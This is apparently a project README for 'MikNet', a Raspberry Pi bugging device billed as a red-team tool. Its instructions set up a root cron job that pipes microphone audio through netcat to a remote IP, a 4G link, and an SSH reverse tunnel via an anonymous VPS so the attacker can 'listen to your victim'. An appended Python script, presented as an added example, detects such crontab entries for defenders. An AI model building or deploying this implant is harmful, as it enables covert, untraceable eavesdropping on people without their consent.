
Autonomous red team implementation allowing sound capture and broadcast through an untraceable front-end server to the attacker's station

GNU General Public License v3.0 (GPL-3.0)

MikNet





Presentation


Video tutorial here :


Hardware



Total cost: less than 100 €

Instructions


- Install Raspbian OS on the SD card (https://www.raspberrypi.com/software)
- At first boot, configure your password and enable SSH (not mandatory)
- Create a cron job by editing the /etc/crontab file and adding this line at the end:
  ```
  * * * * * root pgrep -x arecord >/dev/null && echo "Process found" || arecord -vv | nc YOUR_REDIRECTOR_PUBLIC_IP_ADDRESS 8080
  ```
- Configure the connection to your 4G router's wireless access point by replacing the content of the file /etc/wpa_supplicant/wpa_supplicant.conf:
  ```
  ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
  update_config=1
  country=FR

  network={
      ssid="MY_4G_ROUTER"
      psk="SuPeRpAsSwOrD"
      key_mgmt=WPA-PSK
  }
  ```
- Configure the Wi-Fi interface of the Raspberry to connect to the 4G router by editing the /etc/network/interfaces file and adding these lines at the end:
  ```
  allow-hotplug wlan0
  iface wlan0 inet dhcp
      wpa-conf /etc/wpa_supplicant/wpa_supplicant.conf
  ```
- Put the SD card into the Raspberry and power up both the 4G router and Raspberry with attached microphone
- Start the anonymous VPS and allow TCP port 8080
- Redirect your VPS port to a local port with the command:
  ```
  ssh -NR 8080:127.0.0.1:8080 YOU_VPS_USER@YOU_VPS_PUBLIC_IP_ADDRESS
  ```
  (If the forwarding is not allowed, verify that AllowTcpForwarding and GatewayPorts are set to "yes" in your /etc/ssh/sshd_config and restart the daemon)
- Listen to your victim by catching the audio transmitted by netcat:
  ```
  nc -nlvp 8080 | aplay -vv
  ```
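
The cron entry above is the artefact a defender examining a suspect device would look for: a scheduled job that pipes an audio capture tool into a network client. The following Python is an added example, not part of the MikNet project; the tool lists and the sample crontab are assumptions constructed for illustration, and the pipeline splitting is a heuristic that ignores shell quoting.

```python
import re
# Tool lists are assumptions for this example; extend them for your fleet.
CAPTURE = {"arecord", "parecord", "pw-record", "rec", "sox", "ffmpeg"}
NETWORK = {"nc", "ncat", "netcat", "socat", "curl", "ssh"}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_command(line, system=True):
    """Return the command of a crontab line, or None for comments/env lines."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None
    # "@reboot" style entries replace the 5 time fields; /etc/crontab adds a user field
    skip = (1 if line.startswith("@") else 5) + (1 if system else 0)
    parts = line.split(None, skip)
    return parts[skip] if len(parts) > skip else None

def tool(stage):
    """Basename of the program that starts one pipeline stage."""
    words = stage.split()
    return words[0].rsplit("/", 1)[-1] if words else ""

def audio_to_network(command):
    """List (capture, network) pairs where captured audio is piped to a network tool."""
    hits = []
    for pipeline in re.split(r"&&|\|\||;", command):   # split command lists first
        stages = [tool(s) for s in pipeline.split("|")]
        for i, name in enumerate(stages):
            sink = next((s for s in stages[i + 1:] if s in NETWORK), None)
            if name in CAPTURE and sink:
                hits.append((name, sink))
    return hits

def scan_crontab(text, system=True):
    """Return (line_number, capture, network) for every suspicious job."""
    return [(n, cap, net)
            for n, line in enumerate(text.splitlines(), 1)
            for cap, net in audio_to_network(cron_command(line, system) or "")]

SAMPLE = """\
# constructed sample in /etc/crontab format; 192.0.2.10 is a documentation address
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root pgrep -x arecord >/dev/null && echo "Process found" || arecord -vv | nc 192.0.2.10 8080
@reboot pi /usr/bin/arecord -f cd | gzip | /usr/bin/socat - TCP:192.0.2.10:9000
0 3 * * * root arecord -d 5 /tmp/test.wav
"""

if __name__ == "__main__":
    for hit in scan_crontab(SAMPLE):
        print("line %d: %s piped to %s" % hit)
```

Pass `system=False` for per-user crontabs, which have no user field; the last sample job records to a local file and is deliberately not flagged.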